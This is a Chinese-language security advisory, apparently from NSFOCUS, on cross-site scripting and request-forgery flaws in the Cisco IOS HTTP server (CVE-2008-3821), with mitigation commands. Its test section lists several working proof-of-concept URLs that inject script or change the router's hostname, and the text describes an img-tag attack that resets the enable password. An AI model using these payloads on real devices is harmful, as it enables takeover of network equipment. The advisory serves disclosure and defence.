安全研究
安全漏洞
Cisco IOS HTTP Server多个跨站脚本漏洞
发布日期:2009-01-14
更新日期:2009-01-15
受影响系统:
Cisco IOS 12.4描述:
Cisco IOS 12.3
Cisco IOS 12.2
Cisco IOS 12.1
Cisco IOS 12.0
BUGTRAQ ID: 33260,33625
CVE(CAN) ID: CVE-2008-3821
Cisco IOS是思科网络设备所使用的互联网操作系统。
如果Cisco IOS中启用了HTTP Server的话,攻击者就可以通过向服务器端二进制程序/脚本提交无效参数执行跨站脚本攻击。这类攻击可能导致替换目标管理界面,或将保密信息重新定向到非授权的第三方,例如,可以通过XMLHttpRequest对象修改/level/15/exec/-/show/run/CR URL所返回的数据。此外攻击者还可以通过跨站请求伪造攻击执行管理操作,例如注入指向/level/15/configure/-/enable/secret/newpass的img标签会将enable口令更改为newpass。
<*来源:Adrian Pastor (m123303@richmond.ac.uk)
Richard J. Brain
链接:http://marc.info/?l=bugtraq&m=123195734420830&w=2
http://marc.info/?l=bugtraq&m=123195579017761&w=2
http://secunia.com/advisories/33461/
http://marc.info/?l=bugtraq&m=123378695630535&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://192.168.1.2/level/15/exec/-/"><body onload=alert("bug")>
http://192.168.1.2/level/15/exec/-/"><iframe onload=alert("bug")>
http://192.168.1.2/exec/"><body onload="alert('bug');">
http://192.168.1.2/level/15/exec/-/"><body
onload=window.location='http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR'>
http://192.168.1.2/exec/"><iframe
src="http://192.168.1.2/level/15/configure/-/hostname/BUGGY/CR">
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 如果设备上无需HTTP server,以配置模式使用以下命令禁用:
no ip http server
no ip http secure-server
* 如果需要HTTP server,控制可访问HTTP server的主机,对HTTP server应用访问控制列表:
ip http access-class {access-list-number | access-list-name}
以下示例仅允许可信任的主机访问Cisco IOS HTTP server:
ip access-list standard 20
permit 192.168.1.0 0.0.0.255
remark "Above is a trusted subnet"
remark "Add further trusted subnets or hosts below"
! (Note: all other access implicitly denied)
! (Apply the access-list to the http server)
ip http access-class 20
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cisco.com/warp/public/707/advisory.html
浏览次数:4841
严重程度:0(网友投票)
绿盟科技给您安全的保障